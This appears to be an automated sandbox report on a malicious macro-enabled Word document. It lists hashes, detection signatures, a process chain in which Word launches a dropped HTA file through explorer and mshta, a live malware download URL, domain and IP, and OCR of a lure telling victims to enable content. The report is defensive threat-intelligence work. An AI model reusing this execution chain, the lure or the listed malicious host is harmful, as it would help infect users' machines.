Loading ...

Play interactive tourEdit tour

Windows Analysis Report instruct_11.21.doc.docm

Overview

General Information

Sample Name:instruct_11.21.doc.docm
Analysis ID:520837
MD5:a9490d94cf547e27dcc0d52dc72e74e7
SHA1:a00e440eb13f84c8b8faba5b81a7d85fce2a4074
SHA256:ee103f8d64cd8fa884ff6a041db2f7aa403c502f54e26337c606044c2f205394
Tags:docmaldocsansiscvba
Infos:

Most interesting Screenshot:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Sigma detected: Suspicious MSHTA Process Patterns
Document exploit detected (process start blacklist hit)
Machine Learning detection for sample
Document contains no OLE stream with summary information
Queries the volume information (name, serial number etc) of a device
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Document has an unknown application name
Uses code obfuscation techniques (call, push, ret)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Internet Provider seen in connection with other malware
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

  • System is w10x64
  • WINWORD.EXE (PID: 6856 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • explorer.exe (PID: 5348 cmdline: c:\windows\explorer c:\users\public\powPowNext.hta MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 7128 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • mshta.exe (PID: 7148 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\powPowNext.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} MD5: 7083239CE743FDB68DFC933B7308E80A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Suspicious MSHTA Process PatternsShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\powPowNext.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , CommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\powPowNext.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 7128, ProcessCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\powPowNext.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ProcessId: 7148

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: instruct_11.21.doc.docmVirustotal: Detection: 49%Perma Link
Antivirus detection for URL or domainShow sources
Source: http://shoulderelliottd.com/boolk/QlaJk8C6vYqIyEwbdypBHv3yJR/wrWWNCD/77427/bebys8?cid=Bm9cAP&wP8zhkKAvira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URLShow sources
Source: shoulderelliottd.comVirustotal: Detection: 9%Perma Link
Machine Learning detection for sampleShow sources
Source: instruct_11.21.doc.docmJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\explorer.exe
Source: global trafficTCP traffic: 192.168.2.4:49783 -> 194.62.42.144:80
Source: global trafficDNS query: name: shoulderelliottd.com
Source: global trafficTCP traffic: 192.168.2.4:49783 -> 194.62.42.144:80
Source: Joe Sandbox ViewASN Name: ZEISS-ASRU ZEISS-ASRU
Source: mshta.exe, 00000006.00000003.713921343.0000000006569000.00000004.00000001.sdmpString found in binary or memory: http://en.wF
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: mshta.exe, 00000006.00000003.728745747.000000000652C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.728238876.00000000065D3000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.728533924.000000000322E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.728654834.000000000652C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.727987202.000000000A7E1000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.728554785.00000000031A9000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.728398097.000000000A9E3000.00000004.00000040.sdmp, mshta.exe, 00000006.00000002.730091556.00000000031AA000.00000004.00000001.sdmpString found in binary or memory: http://shoulderelliottd.com/boolk/QlaJk8C6vYqIyEwbdypBHv3yJR/wrWWNCD/77427/bebys8?cid=Bm9cAP&wP8zhkK
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://api.aadrm.com
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://api.aadrm.com/
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://api.cortana.ai
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://api.office.net
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://api.onedrive.com
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://augloop.office.com
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://cdn.entity.
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://clients.config.office.net/
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://config.edge.skype.com
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://cortana.ai
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://cortana.ai/api
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://cr.office.com
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://dev.cortana.ai
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://devnull.onenote.com
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://directory.services.
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://enrichment.osi.office.net/
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://graph.windows.net
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://graph.windows.net/
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://lifecycle.office.com
Source: mshta.exe, 00000006.00000003.726000483.0000000008AC6000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://login.windows.local
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://management.azure.com
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://management.azure.com/
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://messaging.office.com/
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://ncus.contentsync.
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://officeapps.live.com
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://onedrive.live.com
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://osi.office.net
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://otelrules.azureedge.net
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://outlook.office.com
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://outlook.office.com/
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://outlook.office365.com
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://outlook.office365.com/
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://pages.store.office.com/review/query
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://roaming.edog.
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://settings.outlook.com
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://staging.cortana.ai
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://tasks.office.com
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://wus2.contentsync.
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 24FED24A-A137-4984-A755-6A68F4E24F72.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: unknownDNS traffic detected: queries for: shoulderelliottd.com

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing" button on the top bar, and then click 'Enable content" Page1 of 1 116words It? O
Source: Screenshot number: 4Screenshot OCR: Enable content" Page1 of 1 116words It? O Type here to search Ki E a a g wg m % - I + lOW, sf
Document contains an embedded VBA macro which may execute processesShow sources
